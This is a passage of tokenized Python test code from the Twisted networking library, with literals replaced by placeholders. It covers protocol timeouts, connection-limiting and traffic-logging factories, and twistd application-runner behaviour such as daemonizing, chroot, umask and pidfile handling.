pump ( [ <NUM_LIT:0.0> , <NUM_LIT:1.0> , <NUM_LIT:0.5> ] ) <EOL> self . failIf ( self . proto . wrappedProtocol . disconnected ) <EOL> self . proto . dataReceived ( '<STR_LIT>' ) <EOL> self . clock . pump ( [ <NUM_LIT:0.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ] ) <EOL> self . failIf ( self . proto . wrappedProtocol . disconnected ) <EOL> self . clock . pump ( [ <NUM_LIT:0.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ] ) <EOL> self . failUnless ( self . proto . wrappedProtocol . disconnected ) <EOL> class TimeoutTester ( protocol . Protocol , policies . TimeoutMixin ) : <EOL> """<STR_LIT>""" <EOL> timeOut = <NUM_LIT:3> <EOL> timedOut = False <EOL> def __init__ ( self , clock ) : <EOL> """<STR_LIT>""" <EOL> self . clock = clock <EOL> def connectionMade ( self ) : <EOL> """<STR_LIT>""" <EOL> self . setTimeout ( self . timeOut ) <EOL> def dataReceived ( self , data ) : <EOL> """<STR_LIT>""" <EOL> self . resetTimeout ( ) <EOL> protocol . Protocol . dataReceived ( self , data ) <EOL> def connectionLost ( self , reason = None ) : <EOL> """<STR_LIT>""" <EOL> self . setTimeout ( None ) <EOL> def timeoutConnection ( self ) : <EOL> """<STR_LIT>""" <EOL> self . timedOut = True <EOL> def callLater ( self , timeout , func , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return self . clock . callLater ( timeout , func , * args , ** kwargs ) <EOL> class TestTimeout ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> """<STR_LIT>""" <EOL> self . clock = task . Clock ( ) <EOL> self . proto = TimeoutTester ( self . clock ) <EOL> def test_overriddenCallLater ( self ) : <EOL> """<STR_LIT>""" <EOL> self . proto . setTimeout ( <NUM_LIT:10> ) <EOL> self . assertEqual ( len ( self . clock . calls ) , <NUM_LIT:1> ) <EOL> def test_timeout ( self ) : <EOL> """<STR_LIT>""" <EOL> self . proto . makeConnection ( StringTransport ( ) ) <EOL> self . clock . pump ( [ <NUM_LIT:0> , <NUM_LIT:0.5> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ] ) <EOL> self . failIf ( self . proto . 
timedOut ) <EOL> self . clock . pump ( [ <NUM_LIT:0> , <NUM_LIT:1.0> ] ) <EOL> self . failUnless ( self . proto . timedOut ) <EOL> def test_noTimeout ( self ) : <EOL> """<STR_LIT>""" <EOL> self . proto . makeConnection ( StringTransport ( ) ) <EOL> self . clock . pump ( [ <NUM_LIT:0> , <NUM_LIT:0.5> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ] ) <EOL> self . failIf ( self . proto . timedOut ) <EOL> self . proto . dataReceived ( '<STR_LIT>' ) <EOL> self . clock . pump ( [ <NUM_LIT:0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> , <NUM_LIT:0.5> ] ) <EOL> self . failIf ( self . proto . timedOut ) <EOL> self . clock . pump ( [ <NUM_LIT:0> , <NUM_LIT:1.0> ] ) <EOL> self . failUnless ( self . proto . timedOut ) <EOL> def test_resetTimeout ( self ) : <EOL> """<STR_LIT>""" <EOL> self . proto . timeOut = None <EOL> self . proto . makeConnection ( StringTransport ( ) ) <EOL> self . proto . setTimeout ( <NUM_LIT:1> ) <EOL> self . assertEqual ( self . proto . timeOut , <NUM_LIT:1> ) <EOL> self . clock . pump ( [ <NUM_LIT:0> , <NUM_LIT> ] ) <EOL> self . failIf ( self . proto . timedOut ) <EOL> self . clock . pump ( [ <NUM_LIT:0> , <NUM_LIT> ] ) <EOL> self . failUnless ( self . proto . timedOut ) <EOL> def test_cancelTimeout ( self ) : <EOL> """<STR_LIT>""" <EOL> self . proto . timeOut = <NUM_LIT:5> <EOL> self . proto . makeConnection ( StringTransport ( ) ) <EOL> self . proto . setTimeout ( None ) <EOL> self . assertEqual ( self . proto . timeOut , None ) <EOL> self . clock . pump ( [ <NUM_LIT:0> , <NUM_LIT:5> , <NUM_LIT:5> , <NUM_LIT:5> ] ) <EOL> self . failIf ( self . proto . timedOut ) <EOL> def test_return ( self ) : <EOL> """<STR_LIT>""" <EOL> self . proto . timeOut = <NUM_LIT:5> <EOL> self . assertEqual ( self . proto . setTimeout ( <NUM_LIT:10> ) , <NUM_LIT:5> ) <EOL> self . assertEqual ( self . proto . setTimeout ( None ) , <NUM_LIT:10> ) <EOL> self . assertEqual ( self . proto . setTimeout ( <NUM_LIT:1> ) , None ) <EOL> self . assertEqual ( self . proto . timeOut , <NUM_LIT:1> ) <EOL> self . 
proto . setTimeout ( None ) <EOL> class LimitTotalConnectionsFactoryTestCase ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def testConnectionCounting ( self ) : <EOL> factory = policies . LimitTotalConnectionsFactory ( ) <EOL> factory . protocol = protocol . Protocol <EOL> self . assertEqual ( <NUM_LIT:0> , factory . connectionCount ) <EOL> p1 = factory . buildProtocol ( None ) <EOL> self . assertEqual ( <NUM_LIT:1> , factory . connectionCount ) <EOL> p2 = factory . buildProtocol ( None ) <EOL> self . assertEqual ( <NUM_LIT:2> , factory . connectionCount ) <EOL> p1 . connectionLost ( None ) <EOL> self . assertEqual ( <NUM_LIT:1> , factory . connectionCount ) <EOL> p2 . connectionLost ( None ) <EOL> self . assertEqual ( <NUM_LIT:0> , factory . connectionCount ) <EOL> def testConnectionLimiting ( self ) : <EOL> factory = policies . LimitTotalConnectionsFactory ( ) <EOL> factory . protocol = protocol . Protocol <EOL> factory . connectionLimit = <NUM_LIT:1> <EOL> p = factory . buildProtocol ( None ) <EOL> self . assertNotEqual ( None , p ) <EOL> self . assertEqual ( <NUM_LIT:1> , factory . connectionCount ) <EOL> self . assertEqual ( None , factory . buildProtocol ( None ) ) <EOL> self . assertEqual ( <NUM_LIT:1> , factory . connectionCount ) <EOL> class OverflowProtocol ( protocol . Protocol ) : <EOL> def connectionMade ( self ) : <EOL> factory . overflowed = True <EOL> factory . overflowProtocol = OverflowProtocol <EOL> factory . overflowed = False <EOL> op = factory . buildProtocol ( None ) <EOL> op . makeConnection ( None ) <EOL> self . assertEqual ( True , factory . overflowed ) <EOL> self . assertEqual ( <NUM_LIT:2> , factory . connectionCount ) <EOL> p . connectionLost ( None ) <EOL> self . assertEqual ( <NUM_LIT:1> , factory . connectionCount ) <EOL> op . connectionLost ( None ) <EOL> self . assertEqual ( <NUM_LIT:0> , factory . 
connectionCount ) <EOL> class WriteSequenceEchoProtocol ( EchoProtocol ) : <EOL> def dataReceived ( self , bytes ) : <EOL> if bytes . find ( '<STR_LIT>' ) != - <NUM_LIT:1> : <EOL> self . transport . writeSequence ( [ bytes ] ) <EOL> else : <EOL> EchoProtocol . dataReceived ( self , bytes ) <EOL> class TestLoggingFactory ( policies . TrafficLoggingFactory ) : <EOL> openFile = None <EOL> def open ( self , name ) : <EOL> assert self . openFile is None , "<STR_LIT>" <EOL> self . openFile = StringIO ( ) <EOL> return self . openFile <EOL> class LoggingFactoryTestCase ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_thingsGetLogged ( self ) : <EOL> """<STR_LIT>""" <EOL> wrappedFactory = Server ( ) <EOL> wrappedFactory . protocol = WriteSequenceEchoProtocol <EOL> t = StringTransportWithDisconnection ( ) <EOL> f = TestLoggingFactory ( wrappedFactory , '<STR_LIT:test>' ) <EOL> p = f . buildProtocol ( ( '<STR_LIT>' , <NUM_LIT> ) ) <EOL> t . protocol = p <EOL> p . makeConnection ( t ) <EOL> v = f . openFile . getvalue ( ) <EOL> self . failUnless ( '<STR_LIT:*>' in v , "<STR_LIT>" % ( v , ) ) <EOL> self . failIf ( t . value ( ) ) <EOL> p . dataReceived ( '<STR_LIT>' ) <EOL> v = f . openFile . getvalue ( ) <EOL> self . assertIn ( "<STR_LIT>" , v ) <EOL> self . assertIn ( "<STR_LIT>" , v ) <EOL> self . assertEqual ( t . value ( ) , '<STR_LIT>' ) <EOL> t . clear ( ) <EOL> p . dataReceived ( '<STR_LIT>' ) <EOL> v = f . openFile . getvalue ( ) <EOL> self . assertIn ( "<STR_LIT>" , v ) <EOL> self . assertEqual ( t . value ( ) , '<STR_LIT>' ) <EOL> p . loseConnection ( ) <EOL> v = f . openFile . getvalue ( ) <EOL> self . assertIn ( '<STR_LIT>' , v ) <EOL> def test_counter ( self ) : <EOL> """<STR_LIT>""" <EOL> wrappedFactory = Server ( ) <EOL> f = TestLoggingFactory ( wrappedFactory , '<STR_LIT:test>' ) <EOL> self . assertEqual ( f . _counter , <NUM_LIT:0> ) <EOL> f . buildProtocol ( ( '<STR_LIT>' , <NUM_LIT> ) ) <EOL> self . assertEqual ( f . 
_counter , <NUM_LIT:1> ) <EOL> f . openFile = None <EOL> f . buildProtocol ( ( '<STR_LIT>' , <NUM_LIT> ) ) <EOL> self . assertEqual ( f . _counter , <NUM_LIT:2> ) <EOL> f . resetCounter ( ) <EOL> self . assertEqual ( f . _counter , <NUM_LIT:0> ) </s>
<s> """<STR_LIT>""" <EOL> import signal , inspect , errno <EOL> import os , sys , StringIO <EOL> try : <EOL> import pwd , grp <EOL> except ImportError : <EOL> pwd = grp = None <EOL> try : <EOL> import cPickle as pickle <EOL> except ImportError : <EOL> import pickle <EOL> from zope . interface import implements <EOL> from zope . interface . verify import verifyObject <EOL> from twisted . trial import unittest <EOL> from twisted . test . test_process import MockOS <EOL> from twisted import plugin <EOL> from twisted . application . service import IServiceMaker <EOL> from twisted . application import service , app , reactors <EOL> from twisted . scripts import twistd <EOL> from twisted . python import log <EOL> from twisted . python . usage import UsageError <EOL> from twisted . python . log import ILogObserver <EOL> from twisted . python . versions import Version <EOL> from twisted . python . components import Componentized <EOL> from twisted . internet . defer import Deferred <EOL> from twisted . internet . interfaces import IReactorDaemonize <EOL> from twisted . python . fakepwd import UserDatabase <EOL> try : <EOL> from twisted . python import syslog <EOL> except ImportError : <EOL> syslog = None <EOL> try : <EOL> from twisted . scripts import _twistd_unix <EOL> except ImportError : <EOL> _twistd_unix = None <EOL> else : <EOL> from twisted . scripts . _twistd_unix import UnixApplicationRunner <EOL> from twisted . scripts . _twistd_unix import UnixAppLogger <EOL> try : <EOL> import profile <EOL> except ImportError : <EOL> profile = None <EOL> try : <EOL> import hotshot <EOL> import hotshot . 
stats <EOL> except ( ImportError , SystemExit ) : <EOL> hotshot = None <EOL> try : <EOL> import pstats <EOL> import cProfile <EOL> except ImportError : <EOL> cProfile = None <EOL> if getattr ( os , '<STR_LIT>' , None ) is None : <EOL> setuidSkip = "<STR_LIT>" <EOL> else : <EOL> setuidSkip = None <EOL> def patchUserDatabase ( patch , user , uid , group , gid ) : <EOL> """<STR_LIT>""" <EOL> pwent = pwd . getpwuid ( os . getuid ( ) ) <EOL> grent = grp . getgrgid ( os . getgid ( ) ) <EOL> database = UserDatabase ( ) <EOL> database . addUser ( <EOL> user , pwent . pw_passwd , uid , pwent . pw_gid , <EOL> pwent . pw_gecos , pwent . pw_dir , pwent . pw_shell ) <EOL> def getgrnam ( name ) : <EOL> result = list ( grent ) <EOL> result [ result . index ( grent . gr_name ) ] = group <EOL> result [ result . index ( grent . gr_gid ) ] = gid <EOL> result = tuple ( result ) <EOL> return { group : result } [ name ] <EOL> patch ( pwd , "<STR_LIT>" , database . getpwnam ) <EOL> patch ( grp , "<STR_LIT>" , getgrnam ) <EOL> class MockServiceMaker ( object ) : <EOL> """<STR_LIT>""" <EOL> tapname = '<STR_LIT>' <EOL> def makeService ( self , options ) : <EOL> """<STR_LIT>""" <EOL> self . options = options <EOL> self . service = service . Service ( ) <EOL> return self . service <EOL> class CrippledAppLogger ( app . AppLogger ) : <EOL> """<STR_LIT>""" <EOL> def start ( self , application ) : <EOL> pass <EOL> class CrippledApplicationRunner ( twistd . _SomeApplicationRunner ) : <EOL> """<STR_LIT>""" <EOL> loggerFactory = CrippledAppLogger <EOL> def preApplication ( self ) : <EOL> pass <EOL> def postApplication ( self ) : <EOL> pass <EOL> class ServerOptionsTest ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_subCommands ( self ) : <EOL> """<STR_LIT>""" <EOL> class FakePlugin ( object ) : <EOL> def __init__ ( self , name ) : <EOL> self . tapname = name <EOL> self . _options = '<STR_LIT>' + name <EOL> self . 
description = '<STR_LIT>' + name <EOL> def options ( self ) : <EOL> return self . _options <EOL> apple = FakePlugin ( '<STR_LIT>' ) <EOL> banana = FakePlugin ( '<STR_LIT>' ) <EOL> coconut = FakePlugin ( '<STR_LIT>' ) <EOL> donut = FakePlugin ( '<STR_LIT>' ) <EOL> def getPlugins ( interface ) : <EOL> self . assertEqual ( interface , IServiceMaker ) <EOL> yield coconut <EOL> yield banana <EOL> yield donut <EOL> yield apple <EOL> config = twistd . ServerOptions ( ) <EOL> self . assertEqual ( config . _getPlugins , plugin . getPlugins ) <EOL> config . _getPlugins = getPlugins <EOL> subCommands = config . subCommands <EOL> expectedOrder = [ apple , banana , coconut , donut ] <EOL> for subCommand , expectedCommand in zip ( subCommands , expectedOrder ) : <EOL> name , shortcut , parserClass , documentation = subCommand <EOL> self . assertEqual ( name , expectedCommand . tapname ) <EOL> self . assertEqual ( shortcut , None ) <EOL> self . assertEqual ( parserClass ( ) , expectedCommand . _options ) , <EOL> self . assertEqual ( documentation , expectedCommand . description ) <EOL> def test_sortedReactorHelp ( self ) : <EOL> """<STR_LIT>""" <EOL> class FakeReactorInstaller ( object ) : <EOL> def __init__ ( self , name ) : <EOL> self . shortName = '<STR_LIT>' + name <EOL> self . description = '<STR_LIT>' + name <EOL> apple = FakeReactorInstaller ( '<STR_LIT>' ) <EOL> banana = FakeReactorInstaller ( '<STR_LIT>' ) <EOL> coconut = FakeReactorInstaller ( '<STR_LIT>' ) <EOL> donut = FakeReactorInstaller ( '<STR_LIT>' ) <EOL> def getReactorTypes ( ) : <EOL> yield coconut <EOL> yield banana <EOL> yield donut <EOL> yield apple <EOL> config = twistd . ServerOptions ( ) <EOL> self . assertEqual ( config . _getReactorTypes , reactors . getReactorTypes ) <EOL> config . _getReactorTypes = getReactorTypes <EOL> config . messageOutput = StringIO . StringIO ( ) <EOL> self . assertRaises ( SystemExit , config . parseOptions , [ '<STR_LIT>' ] ) <EOL> helpOutput = config . messageOutput . 
getvalue ( ) <EOL> indexes = [ ] <EOL> for reactor in apple , banana , coconut , donut : <EOL> def getIndex ( s ) : <EOL> self . assertIn ( s , helpOutput ) <EOL> indexes . append ( helpOutput . index ( s ) ) <EOL> getIndex ( reactor . shortName ) <EOL> getIndex ( reactor . description ) <EOL> self . assertEqual ( <EOL> indexes , sorted ( indexes ) , <EOL> '<STR_LIT>' % ( <EOL> helpOutput , ) ) <EOL> def test_postOptionsSubCommandCausesNoSave ( self ) : <EOL> """<STR_LIT>""" <EOL> config = twistd . ServerOptions ( ) <EOL> config . subCommand = '<STR_LIT>' <EOL> config . postOptions ( ) <EOL> self . assertEqual ( config [ '<STR_LIT>' ] , True ) <EOL> def test_postOptionsNoSubCommandSavesAsUsual ( self ) : <EOL> """<STR_LIT>""" <EOL> config = twistd . ServerOptions ( ) <EOL> config . postOptions ( ) <EOL> self . assertEqual ( config [ '<STR_LIT>' ] , False ) <EOL> def test_listAllProfilers ( self ) : <EOL> """<STR_LIT>""" <EOL> config = twistd . ServerOptions ( ) <EOL> helpOutput = str ( config ) <EOL> for profiler in app . AppProfiler . profilers : <EOL> self . assertIn ( profiler , helpOutput ) <EOL> def test_defaultUmask ( self ) : <EOL> """<STR_LIT>""" <EOL> config = twistd . ServerOptions ( ) <EOL> self . assertEqual ( config [ '<STR_LIT>' ] , None ) <EOL> def test_umask ( self ) : <EOL> """<STR_LIT>""" <EOL> config = twistd . ServerOptions ( ) <EOL> config . parseOptions ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertEqual ( config [ '<STR_LIT>' ] , <NUM_LIT> ) <EOL> config . parseOptions ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertEqual ( config [ '<STR_LIT>' ] , <NUM_LIT> ) <EOL> def test_invalidUmask ( self ) : <EOL> """<STR_LIT>""" <EOL> config = twistd . ServerOptions ( ) <EOL> self . assertRaises ( UsageError , config . parseOptions , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> if _twistd_unix is None : <EOL> msg = "<STR_LIT>" <EOL> test_defaultUmask . skip = test_umask . skip = test_invalidUmask . 
skip = msg <EOL> def test_unimportableConfiguredLogObserver ( self ) : <EOL> """<STR_LIT>""" <EOL> config = twistd . ServerOptions ( ) <EOL> e = self . assertRaises ( UsageError , config . parseOptions , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertTrue ( e . args [ <NUM_LIT:0> ] . startswith ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) ) <EOL> self . assertNotIn ( '<STR_LIT:\n>' , e . args [ <NUM_LIT:0> ] ) <EOL> def test_badAttributeWithConfiguredLogObserver ( self ) : <EOL> """<STR_LIT>""" <EOL> config = twistd . ServerOptions ( ) <EOL> e = self . assertRaises ( UsageError , config . parseOptions , <EOL> [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> self . assertTrue ( e . args [ <NUM_LIT:0> ] . startswith ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) ) <EOL> self . assertNotIn ( '<STR_LIT:\n>' , e . args [ <NUM_LIT:0> ] ) <EOL> class TapFileTest ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> """<STR_LIT>""" <EOL> self . tapfile = self . mktemp ( ) <EOL> f = file ( self . tapfile , '<STR_LIT:wb>' ) <EOL> pickle . dump ( service . Application ( "<STR_LIT>" ) , f ) <EOL> f . close ( ) <EOL> def test_createOrGetApplicationWithTapFile ( self ) : <EOL> """<STR_LIT>""" <EOL> config = twistd . ServerOptions ( ) <EOL> config . parseOptions ( [ '<STR_LIT>' , self . tapfile ] ) <EOL> application = CrippledApplicationRunner ( config ) . createOrGetApplication ( ) <EOL> self . assertEqual ( service . IService ( application ) . name , '<STR_LIT>' ) <EOL> class TestLoggerFactory ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , runner ) : <EOL> self . runner = runner <EOL> def start ( self , application ) : <EOL> """<STR_LIT>""" <EOL> self . runner . order . append ( "<STR_LIT>" ) <EOL> self . runner . hadApplicationLogObserver = hasattr ( self . runner , <EOL> '<STR_LIT>' ) <EOL> def stop ( self ) : <EOL> """<STR_LIT>""" <EOL> class TestApplicationRunner ( app . 
ApplicationRunner ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , options ) : <EOL> app . ApplicationRunner . __init__ ( self , options ) <EOL> self . order = [ ] <EOL> self . logger = TestLoggerFactory ( self ) <EOL> def preApplication ( self ) : <EOL> self . order . append ( "<STR_LIT>" ) <EOL> self . hadApplicationPreApplication = hasattr ( self , '<STR_LIT>' ) <EOL> def postApplication ( self ) : <EOL> self . order . append ( "<STR_LIT>" ) <EOL> self . hadApplicationPostApplication = hasattr ( self , '<STR_LIT>' ) <EOL> class ApplicationRunnerTest ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> config = twistd . ServerOptions ( ) <EOL> self . serviceMaker = MockServiceMaker ( ) <EOL> config . loadedPlugins = { '<STR_LIT>' : self . serviceMaker } <EOL> config . subOptions = object ( ) <EOL> config . subCommand = '<STR_LIT>' <EOL> self . config = config <EOL> def test_applicationRunnerGetsCorrectApplication ( self ) : <EOL> """<STR_LIT>""" <EOL> arunner = CrippledApplicationRunner ( self . config ) <EOL> arunner . run ( ) <EOL> self . assertIdentical ( <EOL> self . serviceMaker . options , self . config . subOptions , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . assertIdentical ( <EOL> self . serviceMaker . service , <EOL> service . IService ( arunner . application ) . services [ <NUM_LIT:0> ] , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def test_preAndPostApplication ( self ) : <EOL> """<STR_LIT>""" <EOL> s = TestApplicationRunner ( self . config ) <EOL> s . run ( ) <EOL> self . assertFalse ( s . hadApplicationPreApplication ) <EOL> self . assertTrue ( s . hadApplicationPostApplication ) <EOL> self . assertTrue ( s . hadApplicationLogObserver ) <EOL> self . assertEqual ( s . order , [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> def _applicationStartsWithConfiguredID ( self , argv , uid , gid ) : <EOL> """<STR_LIT>""" <EOL> self . config . 
parseOptions ( argv ) <EOL> events = [ ] <EOL> class FakeUnixApplicationRunner ( twistd . _SomeApplicationRunner ) : <EOL> def setupEnvironment ( self , chroot , rundir , nodaemon , umask , <EOL> pidfile ) : <EOL> events . append ( '<STR_LIT>' ) <EOL> def shedPrivileges ( self , euid , uid , gid ) : <EOL> events . append ( ( '<STR_LIT>' , euid , uid , gid ) ) <EOL> def startReactor ( self , reactor , oldstdout , oldstderr ) : <EOL> events . append ( '<STR_LIT>' ) <EOL> def removePID ( self , pidfile ) : <EOL> pass <EOL> class FakeService ( object ) : <EOL> implements ( service . IService , service . IProcess ) <EOL> processName = None <EOL> uid = None <EOL> gid = None <EOL> def setName ( self , name ) : <EOL> pass <EOL> def setServiceParent ( self , parent ) : <EOL> pass <EOL> def disownServiceParent ( self ) : <EOL> pass <EOL> def privilegedStartService ( self ) : <EOL> events . append ( '<STR_LIT>' ) <EOL> def startService ( self ) : <EOL> events . append ( '<STR_LIT>' ) <EOL> def stopService ( self ) : <EOL> pass <EOL> application = FakeService ( ) <EOL> verifyObject ( service . IService , application ) <EOL> verifyObject ( service . IProcess , application ) <EOL> runner = FakeUnixApplicationRunner ( self . config ) <EOL> runner . preApplication ( ) <EOL> runner . application = application <EOL> runner . postApplication ( ) <EOL> self . assertEqual ( <EOL> events , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , <EOL> ( '<STR_LIT>' , False , uid , gid ) , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def test_applicationStartsWithConfiguredNumericIDs ( self ) : <EOL> """<STR_LIT>""" <EOL> uid = <NUM_LIT> <EOL> gid = <NUM_LIT> <EOL> self . _applicationStartsWithConfiguredID ( <EOL> [ "<STR_LIT>" , str ( uid ) , "<STR_LIT>" , str ( gid ) ] , uid , gid ) <EOL> test_applicationStartsWithConfiguredNumericIDs . 
skip = setuidSkip <EOL> def test_applicationStartsWithConfiguredNameIDs ( self ) : <EOL> """<STR_LIT>""" <EOL> user = "<STR_LIT:foo>" <EOL> uid = <NUM_LIT> <EOL> group = "<STR_LIT:bar>" <EOL> gid = <NUM_LIT> <EOL> patchUserDatabase ( self . patch , user , uid , group , gid ) <EOL> self . _applicationStartsWithConfiguredID ( <EOL> [ "<STR_LIT>" , user , "<STR_LIT>" , group ] , uid , gid ) <EOL> test_applicationStartsWithConfiguredNameIDs . skip = setuidSkip <EOL> def test_startReactorRunsTheReactor ( self ) : <EOL> """<STR_LIT>""" <EOL> reactor = DummyReactor ( ) <EOL> runner = app . ApplicationRunner ( { <EOL> "<STR_LIT>" : False , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : False } ) <EOL> runner . startReactor ( reactor , None , None ) <EOL> self . assertTrue ( <EOL> reactor . called , "<STR_LIT>" ) <EOL> class UnixApplicationRunnerSetupEnvironmentTests ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> if _twistd_unix is None : <EOL> skip = "<STR_LIT>" <EOL> unset = object ( ) <EOL> def setUp ( self ) : <EOL> self . root = self . unset <EOL> self . cwd = self . unset <EOL> self . mask = self . unset <EOL> self . daemon = False <EOL> self . pid = os . getpid ( ) <EOL> self . patch ( os , '<STR_LIT>' , lambda path : setattr ( self , '<STR_LIT:root>' , path ) ) <EOL> self . patch ( os , '<STR_LIT>' , lambda path : setattr ( self , '<STR_LIT>' , path ) ) <EOL> self . patch ( os , '<STR_LIT>' , lambda mask : setattr ( self , '<STR_LIT>' , mask ) ) <EOL> self . patch ( _twistd_unix , "<STR_LIT>" , self . daemonize ) <EOL> self . runner = UnixApplicationRunner ( { } ) <EOL> def daemonize ( self , reactor , os ) : <EOL> """<STR_LIT>""" <EOL> self . daemon = True <EOL> self . patch ( os , '<STR_LIT>' , lambda : self . pid + <NUM_LIT:1> ) <EOL> def test_chroot ( self ) : <EOL> """<STR_LIT>""" <EOL> self . runner . setupEnvironment ( "<STR_LIT>" , "<STR_LIT:.>" , True , None , None ) <EOL> self . assertEqual ( self . 
root , "<STR_LIT>" ) <EOL> def test_noChroot ( self ) : <EOL> """<STR_LIT>""" <EOL> self . runner . setupEnvironment ( None , "<STR_LIT:.>" , True , None , None ) <EOL> self . assertIdentical ( self . root , self . unset ) <EOL> def test_changeWorkingDirectory ( self ) : <EOL> """<STR_LIT>""" <EOL> self . runner . setupEnvironment ( None , "<STR_LIT>" , True , None , None ) <EOL> self . assertEqual ( self . cwd , "<STR_LIT>" ) <EOL> def test_daemonize ( self ) : <EOL> """<STR_LIT>""" <EOL> self . runner . setupEnvironment ( None , "<STR_LIT:.>" , False , None , None ) <EOL> self . assertTrue ( self . daemon ) <EOL> def test_noDaemonize ( self ) : <EOL> """<STR_LIT>""" <EOL> self . runner . setupEnvironment ( None , "<STR_LIT:.>" , True , None , None ) <EOL> self . assertFalse ( self . daemon ) <EOL> def test_nonDaemonPIDFile ( self ) : <EOL> """<STR_LIT>""" <EOL> pidfile = self . mktemp ( ) <EOL> self . runner . setupEnvironment ( None , "<STR_LIT:.>" , True , None , pidfile ) <EOL> fObj = file ( pidfile ) <EOL> pid = int ( fObj . read ( ) ) <EOL> fObj . close ( ) <EOL> self . assertEqual ( pid , self . pid ) <EOL> def test_daemonPIDFile ( self ) : <EOL> """<STR_LIT>""" <EOL> pidfile = self . mktemp ( ) <EOL> self . runner . setupEnvironment ( None , "<STR_LIT:.>" , False , None , pidfile ) <EOL> fObj = file ( pidfile ) <EOL> pid = int ( fObj . read ( ) ) <EOL> fObj . close ( ) <EOL> self . assertEqual ( pid , self . pid + <NUM_LIT:1> ) <EOL> def test_umask ( self ) : <EOL> """<STR_LIT>""" <EOL> self . runner . setupEnvironment ( None , "<STR_LIT:.>" , False , <NUM_LIT> , None ) <EOL> self . assertEqual ( self . mask , <NUM_LIT> ) <EOL> def test_noDaemonizeNoUmask ( self ) : <EOL> """<STR_LIT>""" <EOL> self . runner . setupEnvironment ( None , "<STR_LIT:.>" , True , None , None ) <EOL> self . assertIdentical ( self . mask , self . unset ) <EOL> def test_daemonizedNoUmask ( self ) : <EOL> """<STR_LIT>""" <EOL> self . runner . 
setupEnvironment ( None , "<STR_LIT:.>" , False , None , None ) <EOL> self . assertEqual ( self . mask , <NUM_LIT> <NUM_LIT> ) <EOL> class UnixApplicationRunnerStartApplicationTests ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> if _twistd_unix is None : <EOL> skip = "<STR_LIT>" <EOL> def test_setupEnvironment ( self ) : <EOL> """<STR_LIT>""" <EOL> options = twistd . ServerOptions ( ) <EOL> options . parseOptions ( [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> application = service . Application ( "<STR_LIT>" ) <EOL> self . runner = UnixApplicationRunner ( options ) <EOL> args = [ ] <EOL> def fakeSetupEnvironment ( self , chroot , rundir , nodaemon , umask , pidfile ) : <EOL> args . extend ( ( chroot , rundir , nodaemon , umask , pidfile ) ) <EOL> self . assertEqual ( <EOL> inspect . getargspec ( self . runner . setupEnvironment ) , <EOL> inspect . getargspec ( fakeSetupEnvironment ) ) <EOL> self . patch ( UnixApplicationRunner , '<STR_LIT>' , fakeSetupEnvironment ) <EOL> self . patch ( UnixApplicationRunner , '<STR_LIT>' , lambda * a , ** kw : None ) <EOL> self . patch ( app , '<STR_LIT>' , lambda * a , ** kw : None ) <EOL> self . runner . startApplication ( application ) <EOL> self . assertEqual ( <EOL> args , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , True , <NUM_LIT> , '<STR_LIT>' ] ) <EOL> class UnixApplicationRunnerRemovePID ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> if _twistd_unix is None : <EOL> skip = "<STR_LIT>" <EOL> def test_removePID ( self ) : <EOL> """<STR_LIT>""" <EOL> runner = UnixApplicationRunner ( { } ) <EOL> path = self . mktemp ( ) <EOL> os . makedirs ( path ) <EOL> pidfile = os . path . join ( path , "<STR_LIT>" ) <EOL> file ( pidfile , "<STR_LIT:w>" ) . close ( ) <EOL> runner . removePID ( pidfile ) <EOL> self . assertFalse ( os . path . 
exists ( pidfile ) ) <EOL> def test_removePIDErrors ( self ) : <EOL> """<STR_LIT>""" <EOL> runner = UnixApplicationRunner ( { } ) <EOL> runner . removePID ( "<STR_LIT>" ) <EOL> errors = self . flushLoggedErrors ( OSError ) <EOL> self . assertEqual ( len ( errors ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( errors [ <NUM_LIT:0> ] . value . errno , errno . ENOENT ) <EOL> class FakeNonDaemonizingReactor ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . _beforeDaemonizeCalled = False <EOL> self . _afterDaemonizeCalled = False <EOL> def beforeDaemonize ( self ) : <EOL> self . _beforeDaemonizeCalled = True <EOL> def afterDaemonize ( self ) : <EOL> self . _afterDaemonizeCalled = True <EOL> class FakeDaemonizingReactor ( FakeNonDaemonizingReactor ) : <EOL> """<STR_LIT>""" <EOL> implements ( IReactorDaemonize ) <EOL> class ReactorDaemonizationTests ( unittest . 